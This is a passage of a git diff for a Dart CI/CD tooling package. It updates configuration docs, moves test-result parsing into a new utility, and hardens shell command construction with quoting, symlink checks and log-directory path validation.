disabled is treated as dead config and fails validation. + You can add custom steps before/after tests using user-preservable sections in the generated workflow — look for `# --- BEGIN USER: pre-test ---` and `# --- END USER: post-test ---` markers. To add additional jobs (including reusable workflow calls), @@ -413,6 +422,7 @@ The `validate` command checks: - TOML files contain required `prompt` and `description` keys - Dart files pass `dart analyze` - Markdown files exist and are non-empty +- `.runtime_ci/config.json` `ci` semantics via `WorkflowGenerator.validate()` (field rules + cross-validation such as `features.web_test` vs `web_test`) The `status` command shows: - Installation status of all required/optional tools @@ -455,13 +465,18 @@ The `.runtime_ci/config.json` file controls all behavior. Here is the complete s }, "cross_repo": { "enabled": true, + "orgs": ["your-org"], "repos": [ { "owner": "your-org", "repo": "dependent-repo", "relationship": "dependency" } - ] + ], + "discovery": { + "enabled": true, + "search_orgs": ["your-org"] + } }, "labels": { "type": ["bug", "feature-request", "enhancement", "documentation", "question"], @@ -514,6 +529,15 @@ The `.runtime_ci/config.json` file controls all behavior. Here is the complete s | `changelog_path` | `String` | `"CHANGELOG.md"` | Path to the CHANGELOG file | | `release_notes_path` | `String` | `"release_notes"` | Directory for release notes artifacts | +#### `sentry` + +| Key | Default | Description | +|---|---|---| +| `organization` | `""` | Sentry organization slug | +| `projects` | `[]` | List of Sentry project slugs to scan | +| `scan_on_pre_release` | `true` | Whether to scan Sentry errors during pre-release | +| `recent_errors_hours` | `168` | Hours of recent errors to include (168 = 7 days) | + #### `thresholds` Controls automated triage actions based on aggregated agent confidence: @@ -550,9 +574,12 @@ Available agents: `code_analysis`, `pr_correlation`, `duplicate`, `sentiment`, ` | Key | Default | Description | |---|---|---| | `enabled` | `true` | Enable cross-repository issue discovery and linking | +| `orgs` | `[]` | Optional allowlist of organizations for cross-repo operations | | `repos` | `[]` | List of dependent repositories to scan | +| `discovery.enabled` | `true` | Enable automatic discovery of related repositories | +| `discovery.search_orgs` | `[]` | Organizations scanned when discovery is enabled | -Each repo entry: `{ "owner": "...", "repo": "...", "relationship": "dependency|consumer|..." }` +Each repo entry: `{ "owner": "...", "repo": "...", "relationship": "dependency|consumer|related|..." }`. The default relationship is `related` when omitted. --- diff --git a/docs/cli/API_REFERENCE.md b/docs/cli/API_REFERENCE.md index 7acdd5b..8673faa 100644 --- a/docs/cli/API_REFERENCE.md +++ b/docs/cli/API_REFERENCE.md @@ -275,7 +275,11 @@ if (isGitInstalled) { - `compareLink(String prevTag, String newTag, [String? label])`: `static String` - `ghLink(String label, String path)`: `static String` - `releaseLink(String tag)`: `static String` + - `escapeHtml(String input)`: `static String` - `collapsible(String title, String content, {bool open = false})`: `static String` +- **TestResultsUtil** + - `parseTestResultsJson(String jsonPath)`: `static TestResults` + - `writeTestJobSummary(TestResults results, int exitCode)`: `static void` - **TemplateResolver** - `resolvePackageRoot()`: `static String` - `resolveTemplatesDir()`: `static String` diff --git a/lib/src/cli/commands/test_command.dart b/lib/src/cli/commands/test_command.dart index cbef56a..cf13209 100644 --- a/lib/src/cli/commands/test_command.dart +++ b/lib/src/cli/commands/test_command.dart @@ -9,6 +9,7 @@ import '../../triage/utils/config.dart'; import '../utils/logger.dart'; import '../utils/repo_utils.dart'; import '../utils/step_summary.dart'; +import '../utils/test_results_util.dart'; import '../utils/sub_package_utils.dart'; /// Run `dart test` on the root package and all configured sub-packages with @@ -44,11 +45,15 @@ class TestCommand extends Command { final failures = []; // Determine log directory: TEST_LOG_DIR (CI) or .dart_tool/test-logs/ (local) - final logDir = Platform.environment['TEST_LOG_DIR'] ?? p.join(repoRoot, '.dart_tool', 'test-logs'); + late final String logDir; try { - Directory(logDir).createSync(recursive: true); + logDir = RepoUtils.resolveTestLogDir(repoRoot); + RepoUtils.ensureSafeDirectory(logDir); + } on StateError catch (e) { + Logger.error('$e'); + exit(1); } on FileSystemException catch (e) { - Logger.error('Cannot create log directory $logDir: $e'); + Logger.error('Cannot use log directory: $e'); exit(1); } Logger.info('Log directory: $logDir'); @@ -118,19 +123,19 @@ class TestCommand extends Command { // Write console output to log files try { - File(p.join(logDir, 'dart_stdout.log')).writeAsStringSync(stdoutBuf.toString()); + RepoUtils.writeFileSafely(p.join(logDir, 'dart_stdout.log'), stdoutBuf.toString()); if (stderrBuf.isNotEmpty) { - File(p.join(logDir, 'dart_stderr.log')).writeAsStringSync(stderrBuf.toString()); + RepoUtils.writeFileSafely(p.join(logDir, 'dart_stderr.log'), stderrBuf.toString()); } } on FileSystemException catch (e) { Logger.warn('Could not write log files: $e'); } // Parse the JSON results file for structured test data - final results = StepSummary.parseTestResultsJson(jsonPath); + final results = TestResultsUtil.parseTestResultsJson(jsonPath); // Generate and write the rich job summary - StepSummary.writeTestJobSummary(results, exitCode); + TestResultsUtil.writeTestJobSummary(results, exitCode); if (exitCode != 0) { Logger.error('Root tests failed with exit code $exitCode'); @@ -211,7 +216,7 @@ class TestCommand extends Command { if (failures.isNotEmpty) { Logger.error('Tests failed for ${failures.length} package(s): ${failures.join(', ')}'); - final failureBullets = failures.map((name) => '- `$name`').join('\n'); + final failureBullets = failures.map((name) => '- `${StepSummary.escapeHtml(name)}`').join('\n'); StepSummary.write('\n## Sub-package Test Failures\n\n$failureBullets\n'); exit(1); } diff --git a/lib/src/cli/commands/validate_command.dart b/lib/src/cli/commands/validate_command.dart index 8eed099..0ba1ce1 100644 --- a/lib/src/cli/commands/validate_command.dart +++ b/lib/src/cli/commands/validate_command.dart @@ -8,6 +8,7 @@ import '../../triage/utils/config.dart'; import '../utils/ci_constants.dart'; import '../utils/logger.dart'; import '../utils/repo_utils.dart'; +import '../utils/workflow_generator.dart'; /// Validate all configuration files. class ValidateCommand extends Command { @@ -88,6 +89,29 @@ class ValidateCommand extends Command { } } + Logger.info(''); + Logger.info('Checking semantic CI config...'); + try { + final ciConfig = WorkflowGenerator.loadCiConfig(repoRoot); + if (ciConfig == null) { + Logger.info('No .runtime_ci/config.json ci section found — skipping semantic CI validation'); + } else { + final ciErrors = WorkflowGenerator.validate(ciConfig); + if (ciErrors.isEmpty) { + Logger.success('Valid CI config semantics: .runtime_ci/config.json#ci'); + } else { + Logger.error('Invalid CI config semantics: .runtime_ci/config.json#ci'); + for (final err in ciErrors) { + Logger.error(' - $err'); + } + allValid = false; + } + } + } on StateError catch (e) { + Logger.error('$e'); + allValid = false; + } + // Validate Stage 1 artifacts Logger.info(''); Logger.info('Checking Stage 1 artifacts from previous runs...'); diff --git a/lib/src/cli/manage_cicd.dart b/lib/src/cli/manage_cicd.dart index 5534b67..69156f9 100644 --- a/lib/src/cli/manage_cicd.dart +++ b/lib/src/cli/manage_cicd.dart @@ -5,6 +5,7 @@ import 'dart:io'; import '../triage/utils/run_context.dart'; import '../triage/utils/config.dart'; +import 'commands/test_command.dart'; import 'options/manage_cicd_options.dart'; import 'utils/step_summary.dart'; @@ -431,7 +432,7 @@ Future _runExplore(String repoRoot) async { _error('Ensure runtime_ci_tooling is properly installed (dart pub get).'); exit(1); } - final prompt = _runSync('dart run $promptScriptPath "$prevTag" "$newVersion"', repoRoot); + final prompt = _runSync('dart run $promptScriptPath ${_shellEscape(prevTag)} ${_shellEscape(newVersion)}', repoRoot); if (prompt.isEmpty) { _error('Prompt generator produced empty output. Check $promptScriptPath'); exit(1); @@ -451,7 +452,7 @@ Future _runExplore(String repoRoot) async { 'sh', [ '-c', - 'cat $promptPath | gemini ' + 'cat ${_shellEscape(promptPath)} | gemini ' '-o json --yolo ' '-m $kGeminiProModel ' "--allowed-tools 'run_shell_command(git),run_shell_command(gh)'", @@ -586,7 +587,7 @@ Future _runCompose(String repoRoot) async { _error('Prompt script not found: $composerScript'); exit(1); } - final prompt = _runSync('dart run $composerScript "$prevTag" "$newVersion"', repoRoot); + final prompt = _runSync('dart run $composerScript ${_shellEscape(prevTag)} ${_shellEscape(newVersion)}', repoRoot); if (prompt.isEmpty) { _error('Composer prompt generator produced empty output.'); exit(1); @@ -635,11 +636,11 @@ Future _runCompose(String repoRoot) async { 'sh', [ '-c', - 'cat $promptPath | gemini ' + 'cat ${_shellEscape(promptPath)} | gemini ' '-o json --yolo ' '-m $kGeminiProModel ' "--allowed-tools 'run_shell_command(git),run_shell_command(gh)' " - '${includes.join(" ")}', + '${includes.map(_shellEscape).join(" ")}', ], workingDirectory: repoRoot, environment: {...Platform.environment}, @@ -805,7 +806,10 @@ Future _runReleaseNotes(String repoRoot) async { _error('Prompt script not found: $rnScript'); exit(1); } - final prompt = _runSync('dart run $rnScript "$prevTag" "$newVersion" "$bumpType"', repoRoot); + final prompt = _runSync( + 'dart run $rnScript ${_shellEscape(prevTag)} ${_shellEscape(newVersion)} ${_shellEscape(bumpType)}', + repoRoot, + ); if (prompt.isEmpty) { _error('Release notes prompt generator produced empty output.'); exit(1); @@ -849,12 +853,12 @@ Future _runReleaseNotes(String repoRoot) async { 'sh', [ '-c', - 'cat $promptPath | gemini ' + 'cat ${_shellEscape(promptPath)} | gemini ' '-o json --yolo ' '-m $kGeminiProModel ' // Expanded tool access: git, gh, AND shell commands for reading files "--allowed-tools 'run_shell_command(git),run_shell_command(gh),run_shell_command(cat),run_shell_command(head),run_shell_command(tail)' " - '${includes.join(" ")}', + '${includes.map(_shellEscape).join(" ")}', ], workingDirectory: repoRoot, environment: {...Platform.environment}, @@ -977,7 +981,7 @@ List> _gatherVerifiedContributors(String repoRoot, String pr // Step 1: Get one commit SHA per unique author email in the release range final gitResult = Process.runSync('sh', [ '-c', - 'git log "$prevTag"..HEAD --format="%H %ae" --no-merges | sort -u -k2,2', + 'git log ${_shellEscape(prevTag)}..HEAD --format="%H %ae" --no-merges | sort -u -k2,2', ], workingDirectory: repoRoot); if (gitResult.exitCode != 0) { @@ -1358,7 +1362,7 @@ Future _generateAutodocFile({ if (libDir.isNotEmpty) promptArgs.add(libDir); if (docType == 'migration' && previousHash.isNotEmpty) promptArgs.add(previousHash); - final prompt = _runSync('dart run $repoRoot/$templatePath ${promptArgs.map((a) => '"$a"').join(' ')}', repoRoot); + final prompt = _runSync('dart run $repoRoot/$templatePath ${promptArgs.map(_shellEscape).join(' ')}', repoRoot); if (prompt.isEmpty) { _warn(' [$moduleId] Empty prompt for $docType, skipping'); @@ -1399,7 +1403,10 @@ Do not skip any -- completeness is more important than brevity. final pass1Result = Process.runSync( 'sh', - ['-c', 'cat ${pass1Prompt.path} | gemini --yolo -m $kGeminiProModel ${includes.join(" ")}'], + [ + '-c', + 'cat ${_shellEscape(pass1Prompt.path)} | gemini --yolo -m $kGeminiProModel ${includes.map(_shellEscape).join(" ")}', + ], workingDirectory: repoRoot, environment: {...Platform.environment}, ); @@ -1488,7 +1495,10 @@ Write the corrected file to the same path: $absOutputFile final pass2Result = Process.runSync( 'sh', - ['-c', 'cat ${pass2Prompt.path} | gemini --yolo -m $kGeminiProModel ${includes.join(" ")}'], + [ + '-c', + 'cat ${_shellEscape(pass2Prompt.path)} | gemini --yolo -m $kGeminiProModel ${includes.map(_shellEscape).join(" ")}', + ], workingDirectory: repoRoot, environment: {...Platform.environment}, ); @@ -1514,7 +1524,7 @@ Write the corrected file to the same path: $absOutputFile /// Compute SHA256 hash of all source files in the given paths. String _computeModuleHash(String repoRoot, List sourcePaths) { // Use git to compute a hash of the directory contents - final paths = sourcePaths.map((p) => '$repoRoot/$p').join(' '); + final paths = sourcePaths.map((p) => _shellEscape('$repoRoot/$p')).join(' '); final result = Process.runSync('sh', [ '-c', 'find $paths -type f \\( -name "*.proto" -o -name "*.dart" \\) 2>/dev/null | sort | xargs cat 2>/dev/null | sha256sum | cut -d" " -f1', @@ -1816,8 +1826,11 @@ Future _runDetermineVersion(String repoRoot, List args) async { _success('Version bump rationale saved to $kVersionBumpsDir/v$newVersion.md'); } else { // Generate basic rationale - final commitCount = _runSync('git rev-list --count "$prevTag"..HEAD 2>/dev/null', repoRoot); - final commits = _runSync('git log "$prevTag"..HEAD --oneline --no-merges 2>/dev/null | head -20', repoRoot); + final commitCount = _runSync('git rev-list --count ${_shellEscape(prevTag)}..HEAD 2>/dev/null', repoRoot); + final commits = _runSync( + 'git log ${_shellEscape(prevTag)}..HEAD --oneline --no-merges 2>/dev/null | head -20', + repoRoot, + ); File(targetPath).writeAsStringSync( '# Version Bump: v$newVersion\n\n' '**Date**: ${DateTime.now().toUtc().toIso8601String()}\n' @@ -2152,105 +2165,8 @@ ${_artifactLink()} /// /// All log files are written to [logDir] (`$TEST_LOG_DIR` in CI, or /// `/.dart_tool/test-logs/` locally). -Future _runTest(String repoRoot) async { - _header('Running Tests'); - - // Skip gracefully if no test/ directory exists - final testDir = Directory('$repoRoot/test'); - if (!testDir.existsSync()) { - _success('No test/ directory found — skipping tests'); - _writeStepSummary('## Test Results\n\n**No test/ directory found — skipped.**\n'); - return; - } - - // Determine log directory: TEST_LOG_DIR (CI) or .dart_tool/test-logs/ (local) - final logDir = Platform.environment['TEST_LOG_DIR'] ?? '$repoRoot/.dart_tool/test-logs'; - try { - Directory(logDir).createSync(recursive: true); - } on FileSystemException catch (e) { - _error('Cannot create log directory $logDir: $e'); - exit(1); - } - - final jsonPath = '$logDir/results.json'; - final expandedPath = '$logDir/expanded.txt'; - - // Build test arguments with two file reporters + expanded console output - final testArgs = [ - 'test', - '--exclude-tags', - 'gcp,integration', - '--chain-stack-traces', - '--reporter', - 'expanded', - '--file-reporter', - 'json:$jsonPath', - '--file-reporter', - 'expanded:$expandedPath', - ]; - - _info('Log directory: $logDir'); - _info('Running: dart ${testArgs.join(' ')}'); - - // Use Process.start with piped output so we can both stream to console - // AND capture the full output for summary generation. - final process = await Process.start(Platform.resolvedExecutable, testArgs, workingDirectory: repoRoot); - - // Stream stdout and stderr to console in real-time while capturing - final stdoutBuf = StringBuffer(); - final stderrBuf = StringBuffer(); - - final stdoutSub = process.stdout.transform(utf8.decoder).listen((data) { - stdout.write(data); - stdoutBuf.write(data); - }); - final stderrSub = process.stderr.transform(utf8.decoder).listen((data) { - stderr.write(data); - stderrBuf.write(data); - }); - - final stdoutDone = stdoutSub.asFuture(); - final stderrDone = stderrSub.asFuture(); - - // Wait for process to exit (45-min safety timeout) - const processTimeout = Duration(minutes: 45); - final exitCode = await process.exitCode.timeout( - processTimeout, - onTimeout: () { - _error('Test process exceeded ${processTimeout.inMinutes}-minute timeout — killing.'); - process.kill(); // No signal arg — cross-platform safe - return -1; - }, - ); - try { - await Future.wait([stdoutDone, stderrDone]).timeout(const Duration(seconds: 30)); - } catch (_) { - // Process killed or streams timed out — cancel subscriptions to avoid leaks - await stdoutSub.cancel(); - await stderrSub.cancel(); - } - - // Parse the JSON results file for structured test data - final results = StepSummary.parseTestResultsJson(jsonPath); - - // Write console output to log file as well (supplements shell-level tee) - try { - File('$logDir/dart_stdout.log').writeAsStringSync(stdoutBuf.toString()); - if (stderrBuf.isNotEmpty) { - File('$logDir/dart_stderr.log').writeAsStringSync(stderrBuf.toString()); - } - } on FileSystemException catch (e) { - _warn('Could not write log files: $e'); - } - - // Generate and write the rich job summary - StepSummary.writeTestJobSummary(results, exitCode); - - if (exitCode != 0) { - _error('Tests failed (exit code $exitCode)'); - exit(exitCode); - } - _success('All tests passed'); +Future _runTest(String _) async { + await TestCommand().run(); } /// Run dart analyze and fail only on actual errors. @@ -2379,7 +2295,7 @@ Future _runDocumentation(String repoRoot) async { _error('Prompt script not found: $docScript'); exit(1); } - final prompt = _runSync('dart run $docScript "$prevTag" "$newVersion"', repoRoot); + final prompt = _runSync('dart run $docScript ${_shellEscape(prevTag)} ${_shellEscape(newVersion)}', repoRoot); if (prompt.isEmpty) { _error('Documentation prompt generator produced empty output.'); exit(1); @@ -2407,11 +2323,11 @@ Future _runDocumentation(String repoRoot) async { 'sh', [ '-c', - 'cat $promptPath | gemini ' + 'cat ${_shellEscape(promptPath)} | gemini ' '-o json --yolo ' '-m $kGeminiProModel ' "--allowed-tools 'run_shell_command(git),run_shell_command(gh),run_shell_command(cat),run_shell_command(head)' " - '${includes.join(" ")}', + '${includes.map(_shellEscape).join(" ")}', ], workingDirectory: repoRoot, environment: {...Platform.environment}, @@ -2832,8 +2748,11 @@ String _detectNextVersion(String repoRoot, String prevTag) { var patch = int.tryParse(parts[2]) ?? 0; // ── Pass 1: Fast regex heuristic (fallback if Gemini unavailable) ── - final commits = _runSync('git log "$prevTag"..HEAD --pretty=format:"%s%n%b" 2>/dev/null', repoRoot); - final commitSubjects = _runSync('git log "$prevTag"..HEAD --pretty=format:"%s" --no-merges 2>/dev/null', repoRoot); + final commits = _runSync('git log ${_shellEscape(prevTag)}..HEAD --pretty=format:"%s%n%b" 2>/dev/null', repoRoot); + final commitSubjects = _runSync( + 'git log ${_shellEscape(prevTag)}..HEAD --pretty=format:"%s" --no-merges 2>/dev/null', + repoRoot, + ); var bump = 'patch'; if (RegExp(r'(BREAKING CHANGE|^[a-z]+(\(.+\))?!:)', multiLine: true).hasMatch(commits)) { @@ -2855,9 +2774,12 @@ String _detectNextVersion(String repoRoot, String prevTag) { // ── Pass 2: Gemini analysis (authoritative, overrides regex if available) ── if (_commandExists('gemini') && Platform.environment['GEMINI_API_KEY'] != null) { - final commitCount = _runSync('git rev-list --count "$prevTag"..HEAD 2>/dev/null', repoRoot); - final changedFiles = _runSync('git diff --name-only "$prevTag"..HEAD 2>/dev/null | head -30', repoRoot); - final diffStat = _runSync('git diff --stat "$prevTag"..HEAD 2>/dev/null | tail -5', repoRoot); + final commitCount = _runSync('git rev-list --count ${_shellEscape(prevTag)}..HEAD 2>/dev/null', repoRoot); + final changedFiles = _runSync( + 'git diff --name-only ${_shellEscape(prevTag)}..HEAD 2>/dev/null | head -30', + repoRoot, + ); + final diffStat = _runSync('git diff --stat ${_shellEscape(prevTag)}..HEAD 2>/dev/null | tail -5', repoRoot); final existingTags = _runSync("git tag -l 'v*' --sort=-version:refname | head -10", repoRoot); final commitSummary = commits.split('\n').take(50).join('\n'); @@ -2904,7 +2826,7 @@ String _detectNextVersion(String repoRoot, String prevTag) { final promptPath = '${versionAnalysisDir.path}/prompt.txt'; File(promptPath).writeAsStringSync(prompt); final geminiResult = _runSync( - 'cat $promptPath | gemini ' + 'cat ${_shellEscape(promptPath)} | gemini ' '-o json --yolo ' '-m $kGeminiProModel ' "--allowed-tools 'run_shell_command(git),run_shell_command(gh)' " @@ -3096,7 +3018,7 @@ String _buildReleaseCommitMessage({ } // Commit range - final commitCount = _runSync('git rev-list --count "$prevTag"..HEAD 2>/dev/null', repoRoot); + final commitCount = _runSync('git rev-list --count ${_shellEscape(prevTag)}..HEAD 2>/dev/null', repoRoot); buf.writeln('---'); buf.writeln('Automated release by CI/CD pipeline (Gemini CLI + GitHub Actions)'); buf.writeln('Commits since $prevTag: $commitCount'); @@ -3115,6 +3037,17 @@ bool _commandExists(String command) { } } +/// Escapes a string for safe interpolation into a shell command. +/// +/// Uses POSIX single-quote style: the value is wrapped in single quotes, and +/// any single quotes within are escaped as `'"'"'` (end quote, literal quote, +/// start quote). This prevents shell injection when user-controlled values +/// (prevTag, newVersion, bumpType, promptArgs, paths, etc.) are interpolated +/// into _runSync or Process.runSync shell commands. +String _shellEscape(String s) { + return "'${s.replaceAll("'", "'\"'\"'")}'"; +} + String _runSync(String command, String workingDirectory) { if (_verbose) _info('[CMD] $command'); final result = Process.runSync('sh', ['-c', command], workingDirectory: workingDirectory); diff --git a/lib/src/cli/utils/repo_utils.dart b/lib/src/cli/utils/repo_utils.dart index 2cf90e1..57aea2b 100644 --- a/lib/src/cli/utils/repo_utils.dart +++ b/lib/src/cli/utils/repo_utils.dart @@ -1,9 +1,13 @@ import 'dart:io'; +import 'package:path/path.dart' as p; + import '../../triage/utils/config.dart'; /// Utilities for finding and working with the repository root. abstract final class RepoUtils { + static final RegExp _controlChars = RegExp(r'[\r\n\t\x00-\x1f]'); + /// Find the repository root by walking up and looking for pubspec.yaml /// with the matching package name from config. static String? findRepoRoot() { @@ -22,4 +26,61 @@ abstract final class RepoUtils { } return null; } + + /// Resolve and validate the test log directory. + /// + /// - Defaults to `/.dart_tool/test-logs` when TEST_LOG_DIR is unset. + /// - If TEST_LOG_DIR is provided, it must be an absolute path and (when + /// RUNNER_TEMP is set) must stay within RUNNER_TEMP. + static String resolveTestLogDir(String repoRoot, {Map? environment}) { + final env = environment ?? Platform.environment; + final defaultDir = p.join(repoRoot, '.dart_tool', 'test-logs'); + final raw = env['TEST_LOG_DIR']; + if (raw == null) return defaultDir; + + final trimmed = raw.trim(); + if (trimmed.isEmpty) return defaultDir; + if (_controlChars.hasMatch(trimmed)) { + throw StateError('TEST_LOG_DIR must not contain newlines or control characters'); + } + + final normalized = p.normalize(trimmed); + if (!p.isAbsolute(normalized)) { + throw StateError('TEST_LOG_DIR must be an absolute path'); + } + + final runnerTempRaw = env['RUNNER_TEMP']?.trim(); + if (runnerTempRaw != null && runnerTempRaw.isNotEmpty) { + final runnerTemp = p.normalize(runnerTempRaw); + if (!(normalized == runnerTemp || p.isWithin(runnerTemp, normalized))) { + throw StateError('TEST_LOG_DIR must be within RUNNER_TEMP: "$runnerTemp"'); + } + } + + return normalized; + } + + /// Return true when the path itself is a symlink. + static bool isSymlinkPath(String path) { + return FileSystemEntity.typeSync(path, followLinks: false) == FileSystemEntityType.link; + } + + /// Create a directory if needed, and refuse symlink-backed paths. + static void ensureSafeDirectory(String dirPath) { + if (isSymlinkPath(dirPath)) { + throw FileSystemException('Refusing to use symlink directory', dirPath); + } + Directory(dirPath).createSync(recursive: true); + if (isSymlinkPath(dirPath)) { + throw FileSystemException('Refusing to use symlink directory', dirPath); + } + } + + /// Write file content while refusing symlink targets. + static void writeFileSafely(String filePath, String content, {FileMode mode = FileMode.write}) { + if (isSymlinkPath(filePath)) { + throw FileSystemException('Refusing to write through symlink', filePath); + } + File(filePath).writeAsStringSync(content, mode: mode); + } } diff --git a/lib/src/cli/utils/step_summary.dart b/lib/src/cli/utils/step_summary.dart index 0208207..747e571 100644 --- a/lib/src/cli/utils/step_summary.dart +++ b/lib/src/cli/utils/step_summary.dart @@ -1,35 +1,8 @@ -import 'dart:convert'; import 'dart:io'; import '../../triage/utils/config.dart'; import 'logger.dart'; - -/// A single failed test record parsed from the JSON reporter output. -class TestFailure { - final String name; - final String error; - final String stackTrace; - final String printOutput; - final int durationMs; - - TestFailure({ - required this.name, - required this.error, - required this.stackTrace, - required this.printOutput, - required this.durationMs, - }); -} - -/// Parsed aggregate test results from the NDJSON file reporter. -class TestResults { - int passed = 0; - int failed = 0; - int skipped = 0; - int totalDurationMs = 0; - final List failures = []; - bool parsed = false; -} +import 'repo_utils.dart'; /// Step summary utilities for GitHub Actions. abstract final class StepSummary { @@ -41,14 +14,22 @@ abstract final class StepSummary { /// Skips appending if the file would exceed the 1 MiB GitHub limit. static void write(String markdown) { final summaryFile = Platform.environment['GITHUB_STEP_SUMMARY']; - if (summaryFile == null) return; + if (summaryFile == null || summaryFile.trim().isEmpty) return; + if (RepoUtils.isSymlinkPath(summaryFile)) { + Logger.warn('Refusing to write step summary through symlink: $summaryFile'); + return; + } final file = File(summaryFile); final currentSize = file.existsSync() ? file.lengthSync() : 0; if (currentSize + markdown.length > _maxSummaryBytes) { Logger.warn('Step summary approaching 1 MiB limit — skipping append'); return; } - file.writeAsStringSync(markdown, mode: FileMode.append); + try { + RepoUtils.writeFileSafely(summaryFile, markdown, mode: FileMode.append); + } on FileSystemException catch (e) { + Logger.warn('Could not write step summary: $e'); + } } /// Build a link to the current workflow run's artifacts page. @@ -100,208 +81,4 @@ abstract final class StepSummary { .replaceAll('"', '"') .replaceAll("'", '''); } - - /// Parse the NDJSON file produced by `dart test --file-reporter json:...`. - static TestResults parseTestResultsJson(String jsonPath) { - final results = TestResults(); - final file = File(jsonPath); - if (!file.existsSync()) { - Logger.warn('No JSON results file found at $jsonPath'); - return results; - } - - results.parsed = true; - - final testNames = {}; - final testStartTimes = {}; - final testErrors = {}; - final testStackTraces = {}; - final testPrints = {}; - - final lines = file.readAsLinesSync(); - for (final line in lines) { - if (line.trim().isEmpty) continue; - try { - final event = jsonDecode(line) as Map; - final type = event['type'] as String?; - - switch (type) { - case 'testStart': - final test = event['test'] as Map?; - if (test == null) break; - final id = test['id'] as int?; - if (id == null) break; - testNames[id] = test['name'] as String? ?? 'unknown'; - testStartTimes[id] = event['time'] as int? ?? 0; - - case 'testDone': - final id = event['testID'] as int?; - if (id == null) break; - final resultStr = event['result'] as String?; - final hidden = event['hidden'] as bool? ?? false; - final skipped = event['skipped'] as bool? ?? false; - - if (hidden) break; - - if (skipped) { - results.skipped++; - } else if (resultStr == 'success') { - results.passed++; - } else if (resultStr == 'failure' || resultStr == 'error') { - results.failed++; - final startTime = testStartTimes[id] ?? 0; - final endTime = event['time'] as int? ?? 0; - results.failures.add( - TestFailure( - name: testNames[id] ?? 'unknown', - error: testErrors[id]?.toString() ?? '', - stackTrace: testStackTraces[id]?.toString() ?? '', - printOutput: testPrints[id]?.toString() ?? '', - durationMs: endTime - startTime, - ), - ); - } - - case 'error': - final id = event['testID'] as int?; - if (id == null) break; - testErrors.putIfAbsent(id, () => StringBuffer()); - if (testErrors[id]!.isNotEmpty) testErrors[id]!.write('\n---\n'); - testErrors[id]!.write(event['error'] as String? ?? ''); - testStackTraces.putIfAbsent(id, () => StringBuffer()); - if (testStackTraces[id]!.isNotEmpty) testStackTraces[id]!.write('\n---\n'); - testStackTraces[id]!.write(event['stackTrace'] as String? ?? ''); - - case 'print': - final id = event['testID'] as int?; - if (id == null) break; - final message = event['message'] as String? ?? ''; - testPrints.putIfAbsent(id, () => StringBuffer()); - testPrints[id]!.writeln(message); - - case 'done': - final time = event['time'] as int? ?? 0; - results.totalDurationMs = time; - } - } catch (e) { - Logger.warn('Skipping malformed JSON line: $e'); - } - } - - return results; - } - - /// Write a rich test summary block to `$GITHUB_STEP_SUMMARY`. - static void writeTestJobSummary(TestResults results, int exitCode) { - final buf = StringBuffer(); - - final platformId = - Platform.environment['PLATFORM_ID'] ?? Platform.environment['RUNNER_NAME'] ?? Platform.operatingSystem; - - buf.writeln('## Test Results — ${escapeHtml(platformId)}'); - buf.writeln(); - - if (!results.parsed) { - final status = exitCode == 0 ? 'passed' : 'failed'; - final icon = exitCode == 0 ? 'NOTE' : 'CAUTION'; - buf.writeln('> [!$icon]'); - buf.writeln('> Tests $status (exit code $exitCode) — no structured results available.'); - buf.writeln(); - buf.writeln('Check the expanded output in test logs for details.'); - buf.writeln(); - buf.writeln(artifactLink(':package: View full test logs')); - write(buf.toString()); - return; - } - - final total = results.passed + results.failed + results.skipped; - final durationSec = (results.totalDurationMs / 1000).toStringAsFixed(1); - - if (results.failed == 0) { - buf.writeln('> [!NOTE]'); - buf.writeln('> All $total tests passed in ${durationSec}s'); - } else { - buf.writeln('> [!CAUTION]'); - buf.writeln('> ${results.failed} of $total tests failed'); - } - buf.writeln(); - - buf.writeln('| Status | Count |'); - buf.writeln('|--------|------:|'); - buf.writeln('| :white_check_mark: Passed | ${results.passed} |'); - buf.writeln('| :x: Failed | ${results.failed} |'); - buf.writeln('| :fast_forward: Skipped | ${results.skipped} |'); - buf.writeln('| **Total** | **$total** |'); - buf.writeln('| **Duration** | **${durationSec}s** |'); - buf.writeln(); - - if (results.failures.isNotEmpty) { - buf.writeln('### Failed Tests'); - buf.writeln(); - - final displayFailures = results.failures.take(20).toList(); - for (final f in displayFailures) { - final durStr = f.durationMs > 0 ? ' (${f.durationMs}ms)' : ''; - buf.writeln('
'); - buf.writeln(':x: ${escapeHtml(f.name)}$durStr'); - buf.writeln(); - - if (f.error.isNotEmpty) { - final error = f.error.length > 2000 ? '${f.error.substring(0, 2000)}\n... (truncated)' : f.error; - buf.writeln('**Error:**'); - final fence = _codeFence(error); - buf.writeln(fence); - buf.writeln(error); - buf.writeln(fence); - buf.writeln(); - } - - if (f.stackTrace.isNotEmpty) { - final stack = f.stackTrace.length > 1500 - ? '${f.stackTrace.substring(0, 1500)}\n... (truncated)' - : f.stackTrace; - buf.writeln('**Stack Trace:**'); - final fence = _codeFence(stack); - buf.writeln(fence); - buf.writeln(stack); - buf.writeln(fence); - buf.writeln(); - } - - if (f.printOutput.isNotEmpty) { - final trimmed = f.printOutput.trimRight(); - final lineCount = trimmed.split('\n').length; - final printPreview = trimmed.length > 1500 ? '${trimmed.substring(0, 1500)}\n... (truncated)' : trimmed; - buf.writeln('**Captured Output ($lineCount lines):**'); - final fence = _codeFence(printPreview); - buf.writeln(fence); - buf.writeln(printPreview); - buf.writeln(fence); - buf.writeln(); - } - - buf.writeln('
'); - buf.writeln(); - } - - if (results.failures.length > 20) { - buf.writeln('_...and ${results.failures.length - 20} more failures. See test logs artifact for full details._'); - buf.writeln(); - } - } - - buf.writeln('---'); - buf.writeln(artifactLink(':package: View full test logs')); - buf.writeln(); - - write(buf.toString()); - } - - static String _codeFence(String content) { - var fence = '```'; - while (content.contains(fence)) { - fence += '`'; - } - return fence; - } } diff --git a/lib/src/cli/utils/test_results_util.dart b/lib/src/cli/utils/test_results_util.dart new file mode 100644 index 0000000..8a18283 --- /dev/null +++ b/lib/src/cli/utils/test_results_util.dart @@ -0,0 +1,265 @@ +import 'dart:convert'; +import 'dart:io'; + +import 'logger.dart'; +import 'step_summary.dart'; + +/// A single failed test record parsed from the JSON reporter output. +class TestFailure { + final String name; + final String error; + final String stackTrace; + final String printOutput; + final int durationMs; + + TestFailure({ + required this.name, + required this.error, + required this.stackTrace, + required this.printOutput, + required this.durationMs, + }); +} + +/// Parsed aggregate test results from the NDJSON file reporter. +class TestResults { + int passed = 0; + int failed = 0; + int skipped = 0; + int totalDurationMs = 0; + final List failures = []; + bool parsed = false; +} + +/// Test-results parsing and step-summary writing for CI. +abstract final class TestResultsUtil { + /// Parse the NDJSON file produced by `dart test --file-reporter json:...`. + static 